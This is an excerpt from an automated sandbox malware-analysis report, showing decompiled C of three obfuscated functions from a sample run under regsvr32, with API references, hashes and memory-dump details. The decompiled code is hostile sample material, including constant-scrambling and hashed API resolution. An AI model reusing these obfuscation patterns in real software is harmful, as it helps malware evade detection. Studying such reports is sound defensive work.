                                                                                                                • String ID:
                                                                                                                • API String ID: 1721193555-0
                                                                                                                • Opcode ID: f5169f6260a4bebca4535edc6bf1aa4b70020725f4de7dd9fcc5a4b73058318c
                                                                                                                • Instruction ID: 1081e97ebbdce1a08216d0b51c74b50b98cf7898be7c4bc2f3674a0e2bbb349d
                                                                                                                • Opcode Fuzzy Hash: f5169f6260a4bebca4535edc6bf1aa4b70020725f4de7dd9fcc5a4b73058318c
                                                                                                                • Instruction Fuzzy Hash: 0D1106B5D1120CFBCF04DFE5DA4A9AEBFB0EB00305F61C198E92566251D3B54B549F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0024823E Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0024823E(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t28;
				void* _t33;
				void* _t37;

				_push(_a8);
				_t37 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024C98A(_t28);
				_v16 = 0xb943dd;
				_v16 = _v16 ^ 0x066b2295;
				_v16 = _v16 ^ 0x06d170ab;
				_v8 = 0x2f21f4;
				_v8 = _v8 + 0xffff1011;
				_v8 = _v8 ^ 0x3fb01539;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x2731cee5;
				_v12 = 0x733cd3;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 + 0xffffe338;
				_v12 = _v12 ^ 0xfff0c595;
				_t33 = E00247F78(__ecx, 0xbd3f148a, __ecx, 0x1f7, __ecx, 0x3d7d933d);
				Process32FirstW(_t37, _a8); // executed
				return _t33;
			}









                                                                                                                0x00248245
                                                                                                                0x00248248
                                                                                                                0x0024824a
                                                                                                                0x0024824d
                                                                                                                0x0024824e
                                                                                                                0x0024824f
                                                                                                                0x00248254
                                                                                                                0x0024825e
                                                                                                                0x0024826a
                                                                                                                0x00248271
                                                                                                                0x00248278
                                                                                                                0x0024827f
                                                                                                                0x00248286
                                                                                                                0x0024828a
                                                                                                                0x00248291
                                                                                                                0x00248298
                                                                                                                0x0024829c
                                                                                                                0x002482a3
                                                                                                                0x002482bf
                                                                                                                0x002482cb
                                                                                                                0x002482d1

                                                                                                                APIs
                                                                                                                • Process32FirstW.KERNEL32(000073AC,06D170AB,?,?,?,?,?,?,?,000073AC), ref: 002482CB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FirstProcess32
                                                                                                                • String ID:
                                                                                                                • API String ID: 2623510744-0
                                                                                                                • Opcode ID: e22307b1a031712957a647e00de3f385f76ac950094eb230400772b66e7a33da
                                                                                                                • Instruction ID: 84017974426876612abb0a0d58e4f539642287fafab2c65ce7fd1590e44e89a9
                                                                                                                • Opcode Fuzzy Hash: e22307b1a031712957a647e00de3f385f76ac950094eb230400772b66e7a33da
                                                                                                                • Instruction Fuzzy Hash: 7F015AB5C1160CFBEB48EFA4890A8EEBBB4EF04314F10C1D8E81567251D7B25B25AF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 002502D8 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E002502D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t45;
				int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				void* _t75;

				_push(_a8);
				_t75 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0024C98A(_t45);
				_v12 = 0xd4268f;
				_t61 = 0x55;
				_v12 = _v12 / _t61;
				_t62 = 0x39;
				_v12 = _v12 / _t62;
				_t63 = 0x19;
				_v12 = _v12 / _t63;
				_v12 = _v12 ^ 0x00038c24;
				_v16 = 0xae7fc4;
				_v16 = _v16 + 0x7c1;
				_v16 = _v16 ^ 0x00ac1f44;
				_v8 = 0x83f9bc;
				_v8 = _v8 ^ 0x1ab9b921;
				_v8 = _v8 | 0xa5451e1d;
				_t64 = 0x5c;
				_v8 = _v8 / _t64;
				_v8 = _v8 ^ 0x021ff71d;
				E00247F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
				_t59 = CloseHandle(_t75); // executed
				return _t59;
			}













                                                                                                                0x002502df
                                                                                                                0x002502e2
                                                                                                                0x002502e4
                                                                                                                0x002502e8
                                                                                                                0x002502e9
                                                                                                                0x002502ee
                                                                                                                0x002502ff
                                                                                                                0x00250304
                                                                                                                0x0025030c
                                                                                                                0x00250311
                                                                                                                0x00250319
                                                                                                                0x0025031e
                                                                                                                0x00250323
                                                                                                                0x0025032a
                                                                                                                0x00250331
                                                                                                                0x00250338
                                                                                                                0x0025033f
                                                                                                                0x00250346
                                                                                                                0x0025034d
                                                                                                                0x00250357
                                                                                                                0x0025035f
                                                                                                                0x00250367
                                                                                                                0x0025037b
                                                                                                                0x00250384
                                                                                                                0x0025038a

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(0067E08B,?,?,?,?,?,?,?,0067E08B), ref: 00250384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: 6d6a9da9ee167c0ffcfaf9049369e4b4b8fd48551b1ecc9561baaae6e16352f1
                                                                                                                • Instruction ID: d3982c9f89280e3cd0935f166174b89e3a9bb7fc21467f3b21e7a1d73968973a
                                                                                                                • Opcode Fuzzy Hash: 6d6a9da9ee167c0ffcfaf9049369e4b4b8fd48551b1ecc9561baaae6e16352f1
                                                                                                                • Instruction Fuzzy Hash: 3A114F71E01208FFEB08DFA5D80A9EEBBB5EB84310F50C09AE514A7280E7B15F219F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00246F64 Relevance: 1.3, APIs: 1, Instructions: 49memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00246F64(void* __ecx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, void* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t39;
				int _t48;
				signed int _t50;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E0024C98A(_t39);
				_v20 = _v20 & 0x00000000;
				_v24 = 0x12197;
				_v12 = 0xd3172d;
				_v12 = _v12 + 0xffff1209;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x3487a079;
				_v16 = 0xdeb36c;
				_t50 = 0x5e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x0008bfd5;
				_v8 = 0x4801f0;
				_v8 = _v8 + 0x72db;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 | 0x09cca24c;
				_v8 = _v8 ^ 0x0dcd7435;
				E00247F78(_t50, 0xbd3f148a, _t50, 0x53, _t50, 0x75e733f0);
				_t48 = HeapFree(_a20, 0, _a12); // executed
				return _t48;
			}











                                                                                                                0x00246f6a
                                                                                                                0x00246f6d
                                                                                                                0x00246f70
                                                                                                                0x00246f73
                                                                                                                0x00246f76
                                                                                                                0x00246f79
                                                                                                                0x00246f7c
                                                                                                                0x00246f81
                                                                                                                0x00246f88
                                                                                                                0x00246f91
                                                                                                                0x00246f98
                                                                                                                0x00246f9f
                                                                                                                0x00246fa3
                                                                                                                0x00246faa
                                                                                                                0x00246fb6
                                                                                                                0x00246fbe
                                                                                                                0x00246fc6
                                                                                                                0x00246fcd
                                                                                                                0x00246fd4
                                                                                                                0x00246fe3
                                                                                                                0x00246fe6
                                                                                                                0x00246fed
                                                                                                                0x00246ffd
                                                                                                                0x0024700d
                                                                                                                0x00247012

                                                                                                                APIs
                                                                                                                • HeapFree.KERNEL32(?,00000000,00000000), ref: 0024700D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.711876622.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                • Associated: 0000000B.00000002.711873249.0000000000240000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 0000000B.00000002.711890699.0000000000264000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_240000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 5b81e59805672090cd6129493cc81cd3a9a6c4af08f07b6262c5320c5b2d06af
                                                                                                                • Instruction ID: f61db3ac5eae8b524bab8e1e89cf00fd5aab0756f2ab9b470f36ce56041b0d1b
                                                                                                                • Opcode Fuzzy Hash: 5b81e59805672090cd6129493cc81cd3a9a6c4af08f07b6262c5320c5b2d06af
                                                                                                                • Instruction Fuzzy Hash: AF1119B5D0120CFBDF45DFA8DD06A9EBBB0EF04304F108198E91466291D3B25B659F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%